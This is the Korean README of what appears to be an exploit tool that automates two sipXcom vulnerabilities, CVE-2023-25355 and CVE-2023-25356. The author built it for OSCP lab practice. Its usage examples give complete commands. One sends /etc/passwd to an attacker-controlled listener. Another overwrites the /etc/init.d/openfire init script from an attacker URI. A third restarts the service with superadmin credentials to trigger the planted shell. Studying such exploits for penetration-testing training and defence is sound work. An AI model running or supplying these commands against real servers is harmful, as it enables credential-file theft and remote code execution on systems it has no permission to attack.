
CVE-2023-25355 및 CVE-2023-25356, 자동 서비스 재로드 포함
이 익스플로잇은 [email protected]에 의해 발견되었으며, 두 가지 훌륭한 자료로 제시되었습니다:
이 취약점을 더욱 자동화하는 저장소가 Alex Linov에 의해 게시되었습니다:
CVE-2023-25355는 sipXcom 서버의 파일이 공격자가 제어하는 웹 서버에 업로드되는 유출 메커니즘입니다.
CVE-2023-25356은 첫 번째 취약점의 확장으로, 공격자가 제어하는 파일을 sipXcom 서버 파일 시스템에 쓸 수 있습니다. sipXcom 서비스가 자체 init 구성을 덮어쓸 수 있기 때문에, 서비스가 재시작되면 쉽게 셸을 얻을 수 있습니다.
여기서 주목할 흥미로운 점은 sipXcom 슈퍼관리자 사용자가 이 서비스를 재시작할 수 있다는 것입니다. 따라서 이 패키지의 목표는 이 서비스의 재시작을 완전히 자동화하는 것입니다.
OSCP를 준비하기 위해, 해킹할 머신이 있는 랩이 있습니다. 특정 랩에서는 이 취약점에 노출된 머신이 상당히 불안정하여, 때로는 랩을 여러 번 시작하고 되돌려야 했습니다. 이것은 성가신 일입니다. 자동화되면 덜 성가십니다.
다음이 필요합니다:
poetry install
그런 다음 활성화된 환경에서 도구를 실행하거나, 디렉터리에서 또는 다른 곳에서 CVE 이름으로 실행할 수 있습니다:
# if the poetry environment is active (poetry shell)
cve_2023_25355 --help
# otherwise, from the current directory
poetry run cve_2023_25355 --help
# otherwise from another directory
poetry -C /shared/tools/CVE/CVE-2023-25355 run cve_2023_25355 --help
다음 예제에서는 공격자가 제어하는 HTTP 리스너에 업로드될 /etc/passwd 파일을 유출하는 페이로드를 전송합니다.
cve_2023_25355 \
--xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
--xmpp-server-address 1.2.3.4 \
--payload '--data-binary @/etc/passwd http://ATTACKER-WEB-LISTENER/some_path'
다음 예제에서는 제공된 URI의 내용으로 /etc/init.d/openfire를 덮어쓰는 페이로드를 전송합니다.
cve_2023_25356 \
--xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
--xmpp-server-address 1.2.3.4 \
--sipxcom-init-file-source-uri 'http://ATTACKER-WEB-LISTENER/my-offensive-sipx-config'
그런 다음 슈퍼관리자 비밀번호를 알고 있다면, 서비스를 재시작하여 구성을 다시 로드하고 가젯을 트리거할 수 있습니다.
run sipxcom_service_restart \
--sipxcom-superuser-username superadmin \
--sipxcom-superuser-password superadmin_password \
--sipxcom-website https://1.2.3.4/
--debug-local-directory /tmp
./proxychains4 -f proxychains.conf cve_2023_25355 [...] --xmpp-server-address 172.1.2.3
Project: